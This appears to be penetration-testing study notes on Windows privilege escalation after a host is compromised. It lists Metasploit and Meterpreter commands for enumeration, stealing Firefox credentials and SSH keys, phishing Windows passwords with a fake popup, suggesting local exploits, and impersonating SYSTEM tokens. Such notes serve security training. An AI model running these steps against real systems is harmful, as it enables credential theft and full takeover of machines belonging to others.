privilege_escalation
When we have exploited a windows host we can try to become NT AUTHORITY/SYSTEM
(or Administrator) by issuing getsystem
, this meterpreter command will try
different techniques to become root, anyway this will not always work, so it
becomes useful to understand other enumeration techniques.
System Enumeration
We can check general information on the system with:
sysinfo
We can enumerate applications which are installed on the target machine:
use post/windows/gather/enum_applications run
We can check which ports are open from meterpreter:
netstat
We can also enumerate services by dropping into a shell
and doing:
sc queryex type= service
Notice that frameworks like empire help us in the privilege escalation and enumeration phase, since this can be quite time consuming.
Stealing Firefox Credentials
Another thing we can try is to steal firefox credentials with:
use post/multi/gather/firefox_creds options set session 1 # or instead of "1" put the session id set decrypt true run # if it does not work proceed with set disclaimer true run # if it does not work proceed with set decrypt false set disclaimer false run
We can also try to steal private ssh keys by doing:
use post/multi/gather/ssh_creds set session 1 run
Phishing Windows Credentials
Other privilege escalation techniques when we already have an account on a windows machine is to ask the user for credentials, we can do this by issuing:
use post/winddows/gather/phish_windows_credentials run
Now a popup will appear to the user asking for credentials, until he inserts the right ones.
Of course other privesc techniques rely on the presence of the installation of wamp or in general of databases where we must try to dump the content, hopefully the credentials.
Local Exploit Suggester
Another technique we can use is to ask metasploit for suggestions on exploits to use for privesc, we can do this by issuing:
use post/multi/recon/local_exploit_suggester set session 1 run
Now we will have the list of all the probable working exploits, we can try them one by one.
Incognito Module
We can steal tokens, these are similar to cookies in theory, they allow to switch windows accounts without reinserting the password. We can do this by executing the following commands within metasploit:
load incognito help list_tokens list_tokens -u impersonate_token "NT AUTHORITY\\SYSTEM"
We can verify if this was successful by issuing:
getuid